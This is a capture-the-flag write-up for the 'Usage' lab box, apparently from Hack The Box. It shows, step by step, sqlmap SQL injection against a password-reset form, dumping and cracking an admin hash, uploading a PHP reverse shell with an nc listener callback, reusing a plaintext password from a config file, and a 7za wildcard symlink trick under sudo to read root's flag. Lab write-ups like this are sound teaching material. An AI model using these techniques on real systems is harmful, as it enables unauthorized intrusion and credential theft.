Usage (Easy)

Easy difficulty Linux box.....

Enumeration

As usual let's start with an nmap scan:

Nmap scan report for 10.10.11.18
Host is up, received syn-ack (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We see SSH and HTTP, so let's add 10.10.11.18 uasge.htb to our hosts file and see the website.

Main page of the website

We see that we can register, login or visit the admin section which takes us to admin.usage.htb which we also need to add to our host file and check later.

After i made an account and logged in, there was only some short articles written on the website, with no useful information.

Dashboard after logging in

So i went to see the admin website, but it only had login and there was nothing i can do to bypass it, so i decided to get back to the main website and test for SQL injection, since i haven't on it.

Now trying in /forget-password we see that when we send a single ' we get a server error:

Error from the single quotation

So this indicates we might be able to do some SQL injection, so i fried SQLmap on it:

I intercepted the request with burp and saved it to a file called it forget-password.req and used the following command:

Exploitation

sqlmap -r forget-password.req -p email  --batch --risk 3 -level 5 --dbs

This took a while and we found boolean based injection in the email field, and sqlmap retrieved the present databases on the system:

available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog

Now let's enumerate the usage_blog database and see what can we get from it.

sqlmap -r forget-password.req -p email  --batch --risk 3 -level 4 -D usage_blog --tables

Doing that we will retrieve the tables in the DB, which one of them will be admin_users which probably has passwords, so let's dump it using:

sqlmap -r forget-password.req -p email  --risk 3 -level 5  --batch -D usage_blog -T admin_users --dump

And we get a username of "admin" and his password hash! Let's start cracking.

hashcat -m 3200 hash.file /opt/wordlists/rockyou.txt

hashcat -m 3200 hash.file --show
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1

Let's try logging in to that admin site we found earlier:

Admin site

Wandering a little bit around, we see in the profile we can upload a profile picture, so lets try uploading a quick reverse shell:

Uploading a shell via burp

So we changed the file extension to php, and the MIME type to "appliaction/php", and you see the content of "shell.php" so submitting the request then refreshing the profile page, we see a new picture.

Uploaded shell

Opening that file (via the link from the download) we get a response and a shell as the dash user.

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.18] 35340
bash: cannot set terminal process group (1243): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ 

Privilege Escalation

Enumerating a little bit, we see there is another user called "xander" and we see a password in

/home/dash/.monitrc and trying it on that user, we succeed.

dash@usage:~$ cat .monitrc 
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd
<SNIP>

And now we have a shell as xander, let's see the sudo privileges we have:

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

So we see this is an executable file, so we upload it to our box, and checking it in ghidra, what's interesting is the backupWebContent function:

void backupWebContent(void)

{
  int iVar1;
  
  iVar1 = chdir("/var/www/html");
  if (iVar1 == 0) {
    system("/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *");
  }
  else {
    perror("Error changing working directory to /var/www/html");
  }
  return;
}

We see a chance to abuse the wildcard use that is being here, and here is a reference from hacktricks.

So we create a file starting with "@" sign, and make a symbolic link to the file we want to read, now when 7z executes, it will treat the file "starting with @" as if it has a list of files it needs to work with, now since we linked it to /root/root.txt it will read it, and say there are no files that it can process.

xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management 
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

<SNIP>

Scan WARNINGS for files and folders:

7c5b992<REDACTED>a764d : No more files

And we get our flag :D and for shell access, you can read an ssh key or something.

That's it for the box!

Happy hacking :) 🧛